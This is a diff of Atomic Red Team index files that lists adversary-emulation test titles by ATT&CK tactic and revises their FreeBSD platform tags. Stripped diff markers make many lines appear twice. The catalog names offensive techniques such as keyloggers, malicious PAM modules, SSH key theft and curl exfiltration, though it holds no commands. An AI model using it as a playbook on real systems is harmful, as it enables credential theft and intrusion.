- Atomic Test #4: Append to the system shell profile [linux]
- Atomic Test #5: Append commands user shell profile [linux]
- Atomic Test #6: System shell profile scripts [linux]
- Atomic Test #7: Create/Append to .bash_logout [linux]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -476,43 +545,56 @@
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- Atomic Test #4: rc.local (FreeBSD) [linux]
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create SysV Service [linux]
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [linux]
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [linux]
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
- Atomic Test #4: Logging sh history to syslog/messages [linux]
- Atomic Test #5: Bash session based keylogger [linux]
- Atomic Test #6: SSHD PAM keylogger [linux]
- Atomic Test #7: Auditd keylogger [linux]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux]
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux]
- Atomic Test #3: Dump individual process memory with Python (Local) [linux]
- Atomic Test #4: Capture Passwords with MimiPenguin [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
@@ -528,19 +610,23 @@
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux]
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux]
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- Atomic Test #2: Search Through sh History [linux]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #3: Extract passwords with grep [linux, macos]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -549,95 +635,112 @@
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux]
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux]
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux]
- Atomic Test #2: Access /etc/master.passwd (Local) [linux]
- Atomic Test #3: Access /etc/passwd (Local) [linux]
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux]
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux]
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #23: Active Directory Domain Search [linux]
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux]
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
- Atomic Test #7: Enumerate users and groups [linux, macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #3: System Service Discovery - systemctl [linux]
- Atomic Test #4: System Service Discovery - service [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #2: Network Share Discovery - linux [linux]
- Atomic Test #3: Network Share Discovery - FreeBSD [linux]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #3: List OS Information [freebsd, linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux]
- Atomic Test #8: Hostname Discovery [linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
- Atomic Test #25: Linux List Kernel Modules [linux]
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux]
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux]
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (freebsd) [linux]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
- Atomic Test #1: Process Discovery - ps [linux, macos]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - FreeBSD [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #5: Examine password expiration policy - All Linux [linux]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #3: Discover System Language with locale [freebsd, linux]
- Atomic Test #3: Discover System Language with locale [linux]
- Atomic Test #4: Discover System Language with localectl [linux]
- Atomic Test #5: Discover System Language by locale file [linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - netstat [linux]
- Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan Nmap for FreeBSD [linux]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -662,38 +765,41 @@
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #4: Change User Password via passwd [macos, linux]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux]
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux]
- Atomic Test #7: Reboot System via `halt` - FreeBSD [linux]
- Atomic Test #8: Reboot System via `halt` - Linux [linux]
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux]
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux]
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
- Atomic Test #11: Reboot System via `poweroff` - Linux [linux]
# execution
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -709,34 +815,39 @@
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
- Atomic Test #2: Command-Line Interface [linux, macos]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- Atomic Test #5: New script file in the tmp directory [freebsd, linux]
- Atomic Test #6: What shell is running [freebsd, linux]
- Atomic Test #7: What shells are available [freebsd, linux]
- Atomic Test #8: Command line scripts [freebsd, linux]
- Atomic Test #5: New script file in the tmp directory [linux]
- Atomic Test #6: What shell is running [linux]
- Atomic Test #7: What shells are available [linux]
- Atomic Test #8: Command line scripts [linux]
- Atomic Test #9: Obfuscated command line scripts [linux]
- Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
- Atomic Test #11: Change login shell [linux]
- Atomic Test #12: Change login shell (freebsd) [linux]
- Atomic Test #13: Environment variable scripts [linux]
- Atomic Test #14: Environment variable scripts (freebsd) [linux]
- Atomic Test #15: Detecting pipe-to-shell [linux]
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
- Atomic Test #17: Current kernel information enumeration [linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux]
- Atomic Test #2: Execute Python via scripts [freebsd, linux]
- Atomic Test #3: Execute Python via Python executables [freebsd, linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux]
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts [linux]
- Atomic Test #3: Execute Python via Python executables [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [linux]
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -760,8 +871,11 @@
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [linux]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -772,21 +886,22 @@
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux]
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #8: Python3 http.server [linux]
- Atomic Test #9: Python3 http.server (freebsd) [linux]
+72 -72
View File
@@ -8,13 +8,13 @@
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #11: Chmod through c script [macos, linux]
@@ -28,7 +28,7 @@
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
